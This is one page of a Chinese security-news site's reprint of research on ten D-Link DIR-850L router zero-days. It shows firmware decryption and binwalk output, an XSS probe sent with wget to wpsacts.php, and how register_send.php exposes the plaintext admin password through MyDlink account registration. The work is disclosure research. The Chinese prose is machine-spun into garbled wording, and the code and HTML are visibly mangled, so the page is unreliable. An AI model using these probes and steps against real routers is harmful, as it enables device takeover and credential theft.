欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

D-link十个漏洞0Day研究(附上详细过程)

来源:本站整理 作者:佚名 时间:2017-09-13 TAG: 我要投稿
        }
       return (EXIT_SUCCESS);
}
user@kali:~/petage-dlink$ ./revbdec DIR850L_REVB_FW207WWb05_h1ke_beta1.bin wrgac25_dlink.2013gui_dir850l > DIR850L_REVB_FW207WWb05_h1ke_beta1.decrypted
user@kali:~/petage-dlink$ binwalk DIR850L_REVB_FW207WWb05_h1ke_beta1.decrypted
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             DLOB firmware header, boot partition: "dev=/dev/mtdblock/1"
593           0x251           LZMA compressed data, properties: 0x88, dictionary size: 1048576 bytes, uncompressed size: 65535 bytes
10380         0x288C          LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 5184868 bytes
1704052       0x1A0074        PackImg section delimiter tag, little endian size: 10518016 bytes; big endian size: 8298496 bytes
1704084       0x1A0094        Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 8296266 bytes, 2678 inodes, blocksize: 131072 bytes, created: 2017-01-20 06:39:29
经由过程以上咱们能够发明,并无对固件镜像停止掩护。
上面表露上面提到破绽漏洞bug的相干细节。
XSS破绽漏洞bug细节
经由过程阐发/htdocs/web文件夹下的php文件,咱们能够发明XSS破绽漏洞bug的细节。
攻击入侵者经由过程XSS破绽漏洞bug来写去认证用户的认证cookies。
/htdocs/web/wpsacts.php文件:
user@kali:~/petage-dlink$ wget -qO- --post-data='action=a>' http://ip:port/wpsacts.php
wpsreport>
        action>a>action>
        result>result>
        reason>reason>
wpsreport>
user@kali:~/petage-dlink$ cat ./fs/htdocs/web/wpsacts.php
[..]
wpsreport>
        action>action>
[...]
/htdocs/web/shareport.php文件中的XSS代码:
[...]
         action>action>
[...]
/htdocs/web/sitesurvey.php文件中的XSS代码:
[...]
        action>action>
[...]
/htdocs/web/wandetect.php文件中的XSS代码:
[...]
        action>action>
[...]
/htdocs/web/wpsacts.php文件中的XSS代码:
[...]
        action>action>
[...]
Retrieving admin password细节
网页 http://ip_of_router/register_send.php 并纰谬用户停止认证,攻击入侵者能够应用该网页的破绽漏洞bug获得装备的节制权。
攻击入侵场景:
攻击入侵者能够用 /register_send.php 页面停止如下操纵:
创立MyDlink Cloud账户;
应用创立的账户登入装备;
把装备参加账户中。
攻击入侵场景重现:
用页面 http://ip_of_router/register_send.php 作为攻击入侵者和长途Dlink API之间的接口。该页面能够提取明文保留的用户口令。
$devpasswd = query("/device/account/entry/password"); "act"];                                 of the device
178 //sign up
179 $post_str_signup = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
180                    "&action=sign-up&accept=accept&email=" .$_POST["outemail"]. "&password=" .$_POST["passwd"].
181                    "&password_verify=" .$_POST["passwd"]. "&name_first=" .$_POST["firstname"]. "&name_last=" .$_POST["lastname"]." ";

上一页  [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载